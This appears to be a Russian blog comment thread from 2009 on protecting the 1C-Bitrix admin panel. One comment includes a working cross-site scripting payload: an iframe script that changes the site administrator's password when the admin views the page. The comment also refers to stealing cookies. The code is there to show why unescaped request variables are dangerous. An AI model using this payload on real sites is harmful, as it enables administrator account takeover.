Комментарии в блоге "Вести производства" на "Версия 8.0: Защищаемся"

Комментарии на "Версия 8.0: Защищаемся" от Никита Романов

Thu, 30 Apr 2009 21:59:30 +0400

Именно по этому надо при смене чувствительной информации запрашивать действующий пароль...

Комментарии на "Версия 8.0: Защищаемся" от Yury Tushinsky

Thu, 23 Apr 2009 18:04:27 +0400

Например, если в этой переменной будет примерно такой код, и на нее зайдет Администратор, то я могу поменять у него пароль на свой (код для FF):
====code====

<script>    
top.jsAdminCalendar = {};    
var ifr = document.createElement("IFRAME");    
ifr.src = "/bitrix/admin/user_edit.php?ID=1";    
ifr.onload = function (e)    
{    
   this.contentDocument.forms[0].NEW_PASSWORD.value = "123456";    
   //this.contentDocument.forms[0].NEW_PASSWORD_CONFIRM.value = "123456";    
   this.onload = null;    
   this.contentDocument.forms[0].submit();    
}    
document.body.appendChild(ifr);    
</script>

=============

Внизу вылезет фрэйм с сообщением об ошибке не совпадения паролей (т.к. эта строка закомментирована).

Вообще говоря, в таком случае я смогу сделать почти тоже самое что и вы со своего браузера (ну плюс к тому же похищать куки, перехватывать пароли, и т.п.).
Выражение - это как широко распахнутые ворота вашего сайта для хакеров

Комментарии на "Версия 8.0: Защищаемся" от Александр Сосновский

Thu, 23 Apr 2009 16:20:05 +0400

Можете привести пример, что должно быть в $_REQUEST["var"],
чтобы конструкция

была опасной?

Комментарии на "Версия 8.0: Защищаемся" от Иван Сергеев

Thu, 23 Apr 2009 13:35:43 +0400

Тоже долго удивлялся, почему за все время жизни моего компьютера у меня не стояло ни одного антивирусника, и все было в порядке! А у других установлены последние обновления антивирусных баз и не помогает!

Не по теме, но. Текст не удобно читать. Глаза со строчки на строчку прыгают...